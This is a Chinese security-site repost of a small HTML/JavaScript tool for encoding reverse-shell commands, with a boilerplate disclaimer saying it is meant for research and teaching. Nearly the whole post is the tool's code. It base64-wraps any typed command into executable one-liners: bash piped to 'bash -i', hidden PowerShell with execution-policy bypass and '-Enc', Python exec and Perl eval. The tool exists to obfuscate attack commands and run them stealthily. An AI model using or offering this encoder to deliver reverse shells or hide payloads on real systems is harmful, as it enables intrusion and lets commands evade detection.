反弹bash命令自动编码工具

admin
admin
admin
139008
文章
114
评论
2022年3月30日20:15:46评论476 views字数 1851阅读6分10秒阅读模式

反弹bash命令自动编码工具

<!DOCTYPE html><html><head>    <title>java runtime exec usage...</title></head><body><p>Input type:    <input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>    <input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>    <input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>    <input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>

<p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>    <textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>

<script>    var taInput = document.querySelector('textarea#input');    var taOutput = document.querySelector('textarea#output');

    function processInput() {        var option = document.querySelector('input[name="option"]:checked').value;

        switch (option) {            case 'bash':                taInput.placeholder = 'Type Bash here...'                taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';                break;            case 'powershell':                taInput.placeholder = 'Type PowerShell here...'                poshInput = ''                for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }                taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);                break;            case 'python':                taInput.placeholder = 'Type Python here...'                taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";                break;            case 'perl':                taInput.placeholder = 'Type Perl here...'                taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";                break;            default:                taOutput.value = ''        }

        if (!taInput.value) taOutput.value = '';    }

    taInput.addEventListener('input', processInput, false);</script>

</body></html>



原文始发于微信公众号(SUMMER渗透学习):反弹bash命令自动编码工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日20:15:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   反弹bash命令自动编码工具https://cn-sec.com/archives/853922.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息